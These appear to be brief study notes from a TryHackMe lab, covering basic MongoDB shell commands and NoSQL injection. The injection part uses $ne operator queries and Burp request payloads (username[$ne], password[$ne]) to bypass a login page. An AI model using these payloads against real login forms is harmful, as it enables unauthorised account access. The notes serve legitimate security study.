mongodb cli:

> use DATABASE_NAME
> db.createCollection("users")
> db.createCollection("roles")

> db.getCollectionNames();
> [ "roles", "users" ]

> db.users.insert({id:"1", username: "admin", email: "admin@thm.labs", password: "idk2021!"})
> db.users.insert({id:"2", username: "user", email: "user@thm.labs", password: "password1!"})

> db.users.find()

> db.users.update({id:"2"}, {$set: {username: "tryhackme"}});

> db.users.remove({'id':'2'})

> db.users.drop()

bypass login page noSQL injection:

$ne = no equal
> db.users.findOne({username: "admin", password: {"$ne":"xyz"}})
{
        "_id" : ObjectId("6183ef6292dea43d75f0c820"),
        "id" : "1",
        "username" : "admin",
        "email" : "admin@thm.labs",
        "password" : "adminpass"
}

> db.users.findOne({username:{"$ne":"admin"},password:{"$ne":"xyz"}})
{
        "_id" : ObjectId("6183ef5b92dea43d75f0c81f"),
        "id" : "2",
        "username" : "user",
        "email" : "user@thm.labs",
        "password" : "password1!"
}

mongo en burp:

GET /search?username[$ne]=user&role[$ne]=user HTTP/1.1
username=admin&password[$ne]=admin
        